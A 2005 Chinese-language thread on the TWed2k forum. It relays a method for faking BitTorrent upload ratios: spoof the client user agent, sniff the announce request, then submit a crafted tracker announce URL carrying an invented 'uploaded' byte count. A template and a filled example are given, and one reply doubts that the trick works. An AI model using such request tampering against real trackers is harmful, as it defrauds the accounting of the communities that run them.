TWed2k - BiTorrent 問題區 - [18禁][新聞] BT 出現可修改上下傳比率的安全漏洞

主題: [18禁][新聞] BT 出現可修改上下傳比率的安全漏洞 [打印本頁]

發表人: innova 時間: 2005-9-22 02:28 AM 主題: [18禁][新聞] BT 出現可修改上下傳比率的安全漏洞

BT 出現可修改上下傳比率的安全漏洞
Increase your upload/download/ratio in torrent trackers
http://xyflar.blogspot.com/

作者發現透過一般可以擷取 HTTP 協定的 sniffer，在搭配 Firefox 以及
User Agent Switcher 這個 Extension 還有任何以 bittorrent 原始碼研
發而成的各種 BT Client，就能夠將 Firefox 偽裝成一個 client 欺騙以
TorrentBits 原始碼開發而成的 tracker 藉此修改上下傳的比率，來提升
等級。

1. 用 User Agent Switcher Extension 切換成 BitTorrent/3.4.2
2. 開啟 sniffer 記錄並且啟動 BT client 隨便選個 torrent 開始下載。
3. 下面是 Firefox 要貼上的網址，來源參考 sniffer 抓到的內容：

http://TRACKER.ADDRESS/announce.php?
info_hash=INFOHASH
&peer_id=PEERID
&port=PORT
&uploaded=UPLOADED
&downloaded=0
&amp;amp;amp;amp;amp;amp;amp;amp;left=0
&numwant=0
&event=completed

Replace:

TRACKER.ADDRESS with the torrent tracker address (ex:
                  www.filelist.org:81)
INFOHASH with info_hash variable taken from the GET request
         from HTTP Analyzer,
PEERID with the peer_id
PORT with the port
UPLOADED with an number that you want, in bytes (ex:
         10737418240 for 10GB)

Example:

http://www.filemp3.org:81/announce.php?
info_hash=%B5%2D%F4%ADM%18%7C%83C%E9%EC%C8%C7%F7%973%3Fap%15
&peer_id=%2DBC0059%2D%C3F%A4c%C4%0D%D35i%93%93%EA
&amp;amp;
&port=12345
&uploaded=10737418240
&downloaded=0
&left=0
&numwant=0
&event=completed

4. 關閉 BT client

5. 嘿嘿... tracker 上面已經顯示你送出了 10GB 的檔案，等級提高了...

--
雖然目前仍看不太懂...

發表人: Acute 時間: 2005-9-22 06:40 AM

這要看BT client 怎樣寫, 未必有效
以前的Azurues 是根據誰傳過來比較多, 就優先回傳給對方, 所以, 跟tracker server 的任何記錄都沒有關連
我用BitComet 的感覺, 也是差不多, 上傳開大, 下載就會跟著變大, 顯然BitComet 也有類似機制
更早以前用Python 寫的一些BT client, 都是採用掃描式傳送法, 也就是, 根據名單, 從頭到尾掃一次, 不管對方傳輸多少, 只要連的上, 就傳一定數量, 然後換下一個, 整個名單掃完, 再從頭來一次.
只有BT Client 自己本身沒有計算接收自何者的資料多寡資訊, 又希望屏除早期的掃描式傳輸模式, 才有可能去用tracker 的資料, 但是, 我沒看過這樣的client 程式

Acute.

歡迎光臨 TWed2k (http://twed2k.org/)